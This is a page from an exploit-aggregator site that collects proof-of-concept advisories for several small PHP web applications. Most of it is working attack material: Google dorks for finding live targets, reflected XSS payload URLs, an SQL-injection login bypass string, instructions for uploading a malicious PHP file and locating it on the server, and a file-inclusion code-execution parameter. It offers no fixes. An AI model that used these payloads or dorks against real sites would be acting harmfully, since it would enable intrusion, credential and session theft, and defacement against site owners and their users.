Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : phpFK v9.2 Beta version SQLi + XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit) | | # Vendor : https://www.frank-karau.de/demo-forum/ | | # Dork : Powered by: phpFK | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}} [+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}} Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : ArabInfotech CMS v 2.0.1 L.L.C Xss Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://www.editpubdz.com/ | | # Dork : intext:"Powered By Editpub" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] use payload : '"()%26%25<acx><script>alert(/indoushka/);</script> [+] http://127.0.0.1/www/reliancerecruiterscom/job-details.php?id=68%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Alumni Club Management Tools v 2.2.7 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://alumnimagnet.com | | # Dork : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : /events.html?daily_detail&date=27-3-2019'"()%26%25<acx><marquee>Hacked by indoushka</marquee> [+] http://127.0.0.1/edu/events.html?daily_detail&date=27-3-2019%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : AngularJS Filemanager v1.5.1 File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://github.com/joni2back/angular-filemanager/archive/master.zip | | # Dork : N/A | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] suffers from an arbitrary file upload vulnerability. [+] http://127.0.0.1/guruquest.net/file-manager/ [+] upload your Ev!l php file ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Alumni Club Management Tools v 2.2.7 Unrestricted File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://alumnimagnet.com | | # Dork : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] suffers from remote sql injection as well From within the control panel, malicious files can be uploaded . [+] Use Payload : user : 'or''='@gmail.com pass : 'or''=' to login . [+] Go to https://127.0.0.1/edu/admin_files.html?sub_op=upload_files [+] find your files https://127.0.0.1/edu/admin_files.html ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] RCE Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | | # Vendor : http://lulus.smkn2purwokerto.sch.id/admin.zip | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] the infected File : <?php require "config.php"; error_reporting(E_ALL ^ (E_NOTICE | E_WARNING)); $page=$_GET['page']; $filename="content/$page.php"; if (!file_exists($filename)) { include "content/home.php"; } else {@include "content/$page.php";} ?> [+] RCE : /index.php?page= [Ev!l] ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>============================================================================================================================ | # Title : Amazon S3 Droppy v 1.4.6 File Upload Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://codecanyon.net/item/droppy-online-file-sharing/10575317 | | # Dork : n/a | ============================================================================================================================ poc : [+] Droppy is an online file sharing platform that can be used to share multiple files among friends, family and colleagues. The files can be sent by email or an url that can be shared with everyone you would like to. [+] Dorking İn Google Or Other Search Enggine [+] Select file Ev!l.php and send it to your e-mail or to direct link. [+] it can be accessed remotely and run code execution. [+] script save a copy of your file in the web server in dir " uploads/" with a secret code [+] when you click in link to download your file right click and choose view source of download link not the page of your email: [+] Exampel : view-source:http://droppy.proxibolt.com/PrHEtFg [+] The script stores the attached files sent inside the hosting server of the website It does not give you the storage path, but when you open the source code of the sending page, you will find the path of the attached file, and it can be accessed remotely and run Means line 100 It contains the secret code generated randomly by the script that renames the file attached to it and stores it inside the folder And when you enter the storage path and combine the secret code with the file name, the file opens for you inside the server, [+] Line 99 , 100 , 101 > > <input type="hidden" name="action" id="action" value="download"> > <input type="hidden" name="secret_code" id="secret_code" value="c40c11023e25cb7cfcba1345c4e26f72"> > <input type="hidden" name="download_id" id="download_id" value="PrHEtFg"> > [+] add the secret code with name of your file that give you access . [+] http://127.0.0.1/Droppy/uploads/c40c11023e25cb7cfcba1345c4e26f72-x.php ====Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | =========================================================================================================================================== </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/gz-multi-hotel-booking-system.html │ │ Vendor : GZ Scripts │ │ Software : GZ Multi Hotel Booking System 1.8 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php GET 'adults' parameter is vulnerable to RXSS https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2 Path: /index.php GET 'children' parameter is vulnerable to RXSS https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2 Path: /index.php GET 'cal_id' parameter is vulnerable to RXSS https://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/gz-e-learning-platform.html │ │ Vendor : GZ Scripts │ │ Software : GZ E Learning Platform 1.8 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: / URL parameter is vulnerable to RXSS https://website/index.php/sxiqd"><script>alert(1)</script>ilec2?controller=GzUser&action=edit&id=5 [-] Done </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://gzscripts.com/php-crm-platform.html │ │ Vendor : GZ Scripts │ │ Software : CRM Platform 1.8 │ │ Vuln Type: Reflected XSS │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php GET 'action' parameter is vulnerable to RXSS https://website/index.php?controller=GzAdmin&action=dashboardpsrfg%3cscript%3ealert(1)%3c%2fscript%3ea4o1z&err=2 [-] Done </code></pre>